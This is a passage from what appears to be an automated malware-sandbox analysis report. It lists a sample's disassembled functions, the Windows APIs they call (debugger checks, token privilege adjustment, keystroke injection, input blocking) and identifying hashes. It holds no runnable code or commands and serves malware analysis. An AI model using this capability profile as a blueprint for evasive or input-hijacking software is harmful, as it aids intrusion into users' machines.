                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                      • String ID:
                                                                      • API String ID: 3906539128-0
                                                                      • Opcode ID: 670b4371b94d2c026e5f37b352e2877006f27edaf8f9a742a6c0eb19402abd4a
                                                                      • Instruction ID: f77fdf9337835019c9b0a93240542720dafb05548d7db8c0ad470046271895db
                                                                      • Opcode Fuzzy Hash: 670b4371b94d2c026e5f37b352e2877006f27edaf8f9a742a6c0eb19402abd4a
                                                                      • Instruction Fuzzy Hash: 5231C27490131CABCB21DF69D98979CBBB8AF58320F5041EAE80CA7260E7709F818F45
                                                                      Function 00A351CD Relevance: 4.6, APIs: 3, Instructions: 76COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00A351DA
                                                                      • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00A35238
                                                                      • SetErrorMode.KERNEL32(00000000), ref: 00A352A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DiskFreeSpace
                                                                      • String ID:
                                                                      • API String ID: 1682464887-0
                                                                      • Opcode ID: 3b62a7ff7545e44cc3a0fc21049c9e3724f88a6d3f26014f29611e009a39bbab
                                                                      • Instruction ID: 401f78593b5ece97299e8e419b5ab941c507633b0009c783d7be652274424c64
                                                                      • Opcode Fuzzy Hash: 3b62a7ff7545e44cc3a0fc21049c9e3724f88a6d3f26014f29611e009a39bbab
                                                                      • Instruction Fuzzy Hash: 06312B75A006189FDB00DFA4D884FAEBBB4FF49314F048099E805AB366DB35E956CB91
                                                                      Function 00A216C3 Relevance: 4.6, APIs: 3, Instructions: 68COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 009DFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 009E0668
                                                                        • Part of subcall function 009DFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 009E0685
                                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00A2170D
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00A2173A
                                                                      • GetLastError.KERNEL32 ref: 00A2174A
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
                                                                      • String ID:
                                                                      • API String ID: 577356006-0
                                                                      • Opcode ID: d219e7bedc1b6b8578e7571785bd39cb7b2f818a4ece69169375ccaca711a277
                                                                      • Instruction ID: 700ce778d0871eda04c89d5aa5db9f829ee40061e1ef3c1a6a7129f7d3c4fcd1
                                                                      • Opcode Fuzzy Hash: d219e7bedc1b6b8578e7571785bd39cb7b2f818a4ece69169375ccaca711a277
                                                                      • Instruction Fuzzy Hash: F41191B2404304AFD718DF54EC86E6BB7B9FB44725B20852EE05657681EB70BC418A60
                                                                      Function 00A2D5EB Relevance: 4.6, APIs: 3, Instructions: 58fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00A2D608
                                                                      • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00A2D645
                                                                      • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00A2D650
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: CloseControlCreateDeviceFileHandle
                                                                      • String ID:
                                                                      • API String ID: 33631002-0
                                                                      • Opcode ID: beb8c235876fc4ffc94ec77157e2225d59c057d283add7e22fd9020a4c74e60f
                                                                      • Instruction ID: 3d3e8cef661f88099ea1427e14354b5862b182d2c087798713f4a86d8c45bc4a
                                                                      • Opcode Fuzzy Hash: beb8c235876fc4ffc94ec77157e2225d59c057d283add7e22fd9020a4c74e60f
                                                                      • Instruction Fuzzy Hash: A0113C75E05328BFDB108F99AC45FAFBBBCEB45B60F108125F914E7294D6704A058BA1
                                                                      Function 00A21663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00A2168C
                                                                      • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00A216A1
                                                                      • FreeSid.ADVAPI32(?), ref: 00A216B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                      • String ID:
                                                                      • API String ID: 3429775523-0
                                                                      • Opcode ID: 743bb6fae49a8533dc42149d96997540ff72f77e900bcf155124540f0c6992ef
                                                                      • Instruction ID: 72f1d8ad2cccd77c29cea12b87ef8914b18b658387eef191875935cdcc001690
                                                                      • Opcode Fuzzy Hash: 743bb6fae49a8533dc42149d96997540ff72f77e900bcf155124540f0c6992ef
                                                                      • Instruction Fuzzy Hash: 4EF0FF71950309FFEB00DFE49C89AAEBBBDFB08615F5049A5E901E2181E774AA448A60
                                                                      Function 009E4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(009F28E9,?,009E4CBE,009F28E9,00A888B8,0000000C,009E4E15,009F28E9,00000002,00000000,?,009F28E9), ref: 009E4D09
                                                                      • TerminateProcess.KERNEL32(00000000,?,009E4CBE,009F28E9,00A888B8,0000000C,009E4E15,009F28E9,00000002,00000000,?,009F28E9), ref: 009E4D10
                                                                      • ExitProcess.KERNEL32 ref: 009E4D22
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CurrentExitTerminate
                                                                      • String ID:
                                                                      • API String ID: 1703294689-0
                                                                      • Opcode ID: 12579284f3c9ec7c83ffbe7afb4c6a51bc1ee7b6917c32a84e51c403b1412226
                                                                      • Instruction ID: 4ad03534369f76da276148f9964563616d9b58fb31af7a4e5f86cb81b9197d33
                                                                      • Opcode Fuzzy Hash: 12579284f3c9ec7c83ffbe7afb4c6a51bc1ee7b6917c32a84e51c403b1412226
                                                                      • Instruction Fuzzy Hash: FAE0BF71000748AFCF12AF55DD09A587F69FF81762B104054FD09CA267CB35ED82CB40
                                                                      Function 009FC2A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 127COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: /
                                                                      • API String ID: 0-2043925204
                                                                      • Opcode ID: e39718df562ee7a1abcc1e51f581c37d67d30e1c89458d1bb53133609770f12a
                                                                      • Instruction ID: 5f6ad7dbe91e28afa51880d06837f8831906e9458d2b7bf1bd6993f4876a47a5
                                                                      • Opcode Fuzzy Hash: e39718df562ee7a1abcc1e51f581c37d67d30e1c89458d1bb53133609770f12a
                                                                      • Instruction Fuzzy Hash: 3D4115B290021DABCB209FB9DD49EBB77BCEB84354F108669FA15DB180E6719D818B50
                                                                      Function 00A1D27A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetUserNameW.ADVAPI32(?,?), ref: 00A1D28C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: NameUser
                                                                      • String ID: X64
                                                                      • API String ID: 2645101109-893830106
                                                                      • Opcode ID: 1695578db9da8f503b07b48ff042c5e48742d2765c31d035f6a8c4e640f9a57c
                                                                      • Instruction ID: acc0a2373ce9dacb34697a30922ab8c4afe4373b2d53525d0dcee5f080c44333
                                                                      • Opcode Fuzzy Hash: 1695578db9da8f503b07b48ff042c5e48742d2765c31d035f6a8c4e640f9a57c
                                                                      • Instruction Fuzzy Hash: A7D0C9B480122DEECF90CB90DC88DD9B3BCBB04306F104552F106A2140D77495498F10
                                                                      Function 009ECAA0 Relevance: 3.5, APIs: 2, Instructions: 464COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                      • Instruction ID: 06928e100d66fef5ffc5f852a2e91ced7cb9be1ea11820f8270e54bf4b1e432e
                                                                      • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                      • Instruction Fuzzy Hash: 7C022DB1E002599BDF15CFA9C8806ADBBF5FF88314F254569E959E7380D731AD42CB80
                                                                      Function 00A368EE Relevance: 3.1, APIs: 2, Instructions: 57fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 00A36918
                                                                      • FindClose.KERNEL32(00000000), ref: 00A36961
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: Find$CloseFileFirst
                                                                      • String ID:
                                                                      • API String ID: 2295610775-0
                                                                      • Opcode ID: 9443df4b17c2da3e4671ff697051e783b4066a2d6c5c52305ca01da0f340cbd6
                                                                      • Instruction ID: 4ca6a4f4e9de2c35881a3987c3195bbf41cffa64dba46e1fc1b9f13f2fc359f5
                                                                      • Opcode Fuzzy Hash: 9443df4b17c2da3e4671ff697051e783b4066a2d6c5c52305ca01da0f340cbd6
                                                                      • Instruction Fuzzy Hash: E7117C71604200AFC710DF69D485B1ABBE5FF85329F14C69DF4698B6A2C730EC06CB91
                                                                      Function 00A337B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00A44891,?,?,00000035,?), ref: 00A337E4
                                                                      • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00A44891,?,?,00000035,?), ref: 00A337F4
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorFormatLastMessage
                                                                      • String ID:
                                                                      • API String ID: 3479602957-0
                                                                      • Opcode ID: 51e6aa169573c565daca84b327be1e8495d7c5ddda794a80adcfba3cfdf47c9e
                                                                      • Instruction ID: f4f0d8a8cf0b1fd82280d29f65a4f4a279d0f3f21d74f33d51a6a37dcd51235a
                                                                      • Opcode Fuzzy Hash: 51e6aa169573c565daca84b327be1e8495d7c5ddda794a80adcfba3cfdf47c9e
                                                                      • Instruction Fuzzy Hash: 27F0E5B1A043292AEB20A7A69C4DFEB7AAEEFC4771F000165F509D22D5D9609904C7B0
                                                                      Function 00A2B226 Relevance: 3.0, APIs: 2, Instructions: 29keyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00A2B25D
                                                                      • keybd_event.USER32(?,76C1C0D0,?,00000000), ref: 00A2B270
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: InputSendkeybd_event
                                                                      • String ID:
                                                                      • API String ID: 3536248340-0
                                                                      • Opcode ID: c4bc73eaa0d604a140ab1b1987ee35a0827d7ffca9681be46113e478da539284
                                                                      • Instruction ID: 08d7e06faed8c43024a91c28698990c8b33645ddd8c630c326525515cdb7e7e7
                                                                      • Opcode Fuzzy Hash: c4bc73eaa0d604a140ab1b1987ee35a0827d7ffca9681be46113e478da539284
                                                                      • Instruction Fuzzy Hash: 86F0F97181434DABDB059FA4D805BEE7BB4FF08315F008019E955A5192D3798611DFA4
                                                                      Function 00A210BF Relevance: 3.0, APIs: 2, Instructions: 24COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00A211FC), ref: 00A210D4
                                                                      • CloseHandle.KERNEL32(?,?,00A211FC), ref: 00A210E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustCloseHandlePrivilegesToken
                                                                      • String ID:
                                                                      • API String ID: 81990902-0
                                                                      • Opcode ID: e46228756734fce3a7fee0231e0f6c4f4d289c5b3780ba1c05a42ba7d25a95e7
                                                                      • Instruction ID: ec13c08eef91b778a94ecd30bf8629b627b0aaa1acbc08c416a2cfa51b342016
                                                                      • Opcode Fuzzy Hash: e46228756734fce3a7fee0231e0f6c4f4d289c5b3780ba1c05a42ba7d25a95e7
                                                                      • Instruction Fuzzy Hash: CBE04F32008710AEE7252B51FC06F7377A9FB04321F10C82EF4A6804B5DB626C90DB50
                                                                      Function 009CCAF0 Relevance: 1.9, Strings: 1, Instructions: 659COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      • Variable is not of type 'Object'., xrefs: 00A10C40
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Variable is not of type 'Object'.
                                                                      • API String ID: 0-1840281001
                                                                      • Opcode ID: a6d6839e2557cff9ffcfa5a0d4bed583d448c1c2ffb4ce8380f0338edfc52b70
                                                                      • Instruction ID: 03e405512723c5f90a7c15ac464e69b38f69dbc3a20445eef39cab1cfc20603a
                                                                      • Opcode Fuzzy Hash: a6d6839e2557cff9ffcfa5a0d4bed583d448c1c2ffb4ce8380f0338edfc52b70
                                                                      • Instruction Fuzzy Hash: A8327BB4D002189BCF14DF90C981FEDBBB5BF45344F14845DE80AAB292D775AE86CB62
                                                                      Function 009F676B Relevance: 1.8, APIs: 1, Instructions: 269COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,009F6766,?,?,00000008,?,?,009FFEFE,00000000), ref: 009F6998
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionRaise
                                                                      • String ID:
                                                                      • API String ID: 3997070919-0
                                                                      • Opcode ID: 506d60cf43294dc85f358998b2b8e25046893975168f0a9431e156ecd8e3ec0d
                                                                      • Instruction ID: 3f2b6f1b282b5b53a9d29ca9264cddddf29dbd8d4cf38c16d02b00c3c382f7b3
                                                                      • Opcode Fuzzy Hash: 506d60cf43294dc85f358998b2b8e25046893975168f0a9431e156ecd8e3ec0d
                                                                      • Instruction Fuzzy Hash: 6AB13A316107099FD719CF28C48AB657BE0FF45364F25865CEA9ACF2A2C335E991CB40
                                                                      Function 009DB119 Relevance: 1.8, Strings: 1, Instructions: 511COMMON
                                                                      Download Yara Rule
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID: 0-3916222277
                                                                      • Opcode ID: 404dc48e31a8fb4bebb7917fd363419c1add269dd0352fa2422b2fced1ca6393
                                                                      • Instruction ID: 059bcf2bb0bd337496411e9df02cfc61103f14ba5c5d9eae2934fbc75be9f283
                                                                      • Opcode Fuzzy Hash: 404dc48e31a8fb4bebb7917fd363419c1add269dd0352fa2422b2fced1ca6393
                                                                      • Instruction Fuzzy Hash: F5124E75A00229DFDB14CF58C881BEEB7B5FF48710F15819AE849EB255EB349E81CB90
                                                                      Function 00A3EAA2 Relevance: 1.5, APIs: 1, Instructions: 25keyboardCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • BlockInput.USER32(00000001), ref: 00A3EABD
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1466803017.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                      • Associated: 00000000.00000002.1466783434.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A5C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466867562.0000000000A82000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466910650.0000000000A8C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1466925761.0000000000A94000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_9c0000_plZuPtZoTk.jbxd
                                                                      Similarity
                                                                      • API ID: BlockInput
                                                                      • String ID:
                                                                      • API String ID: 3456056419-0
                                                                      • Opcode ID: 51e618186bc6e575716fd40150f4c55836c0dcfca9d7f6ea40ce1a23050364f0
                                                                      • Instruction ID: f920f6e23a4d2688c141ce0138d63babe6c3b20555c8a499eaf64c3ca1ec2f77
                                                                      • Opcode Fuzzy Hash: 51e618186bc6e575716fd40150f4c55836c0dcfca9d7f6ea40ce1a23050364f0
                                                                      • Instruction Fuzzy Hash: 19E01A316002059FC710EF59D805E9ABBE9AF987A1F00841AFC49C7391DA70A9418B91
                                                                      Function 009E09D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                                      Download Yara Rule
                                                                      APIs
